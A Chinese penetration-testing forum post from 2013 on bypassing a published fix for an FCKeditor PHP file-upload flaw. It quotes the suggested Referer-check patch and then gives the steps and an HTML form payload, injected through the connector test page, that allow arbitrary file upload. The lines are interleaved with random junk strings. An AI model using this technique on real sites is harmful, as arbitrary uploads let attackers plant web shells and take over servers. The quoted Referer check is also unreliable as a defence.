中国网络渗透测试联盟
标题:
fckeditor 漏洞修复后的二次利用
[打印本页]
作者:
admin
时间:
2013-1-11 21:12
标题:
fckeditor 漏洞修复后的二次利用
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
( b0 T3 Q, L; G3 Y; I* H
网上给出的修复方案是
2 z' U9 x9 l8 }% J+ V+ N, ]
修复方法,删除FCK编辑器用其他的编辑器
! q6 e+ r/ j4 g2 v2 ^( W ]
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
# C' Q# B* e: U( w# j7 O, `9 n) h
在
+ u* a- i) F& }- Z
require(‘config.php’);
" `$ ]! s& o. y, v
require(‘util.php’);
% t/ @7 `: L- x
的下面添加以下代码—————————–
0 D) p, r- x# R. e$ ?$ r$ j- F) ]
//防止外部提交
$ F5 E5 f% H8 F8 l% j
function outsidepost()
1 r/ h* x. c) B* O6 Z
{
7 Z/ R3 A4 H& T! j' T
$servername=$_SERVER['SERVER_NAME'];
6 ~. H# [6 S* |8 p& z
$sub_from=@$_SERVER['HTTP_REFERER'];
2 H5 l& ^5 _! I# h5 l: d$ P
$sub_len=strlen($servername);
t! c/ }4 [- d$ Q) X1 P) E, s: [& E' L
$checkfrom=substr($sub_from,7,$sub_len);
: I$ @' m6 T6 G+ {9 \
if($checkfrom!=$servername){
% x+ L& ?/ ?/ g; i1 a4 T
echo(“you don’t outsidepost!”);
. L% H$ \0 W9 {; k
exit;
' _2 K _; Q, e$ {
}
! U/ f8 T& c7 [( T9 {9 c K
}
$ E# P/ H8 S$ _' G( o) \2 T
outsidepost();
$ N1 H/ T9 `8 \' u5 b) S
防止外部提交,但是没有防止内部提交,
! T' D! V/ ]4 f# z0 R. W
利用方法:
2 S9 n2 y& \& R8 T. K" ~: \6 u
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
. c2 h2 r( }! m8 I
2,在Current Folder 框输入
0 K, p& }4 B; l' n) b! ^8 a
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
1 \8 B. p: f! b3 c
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
+ F, g2 m- `* H' P" o
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2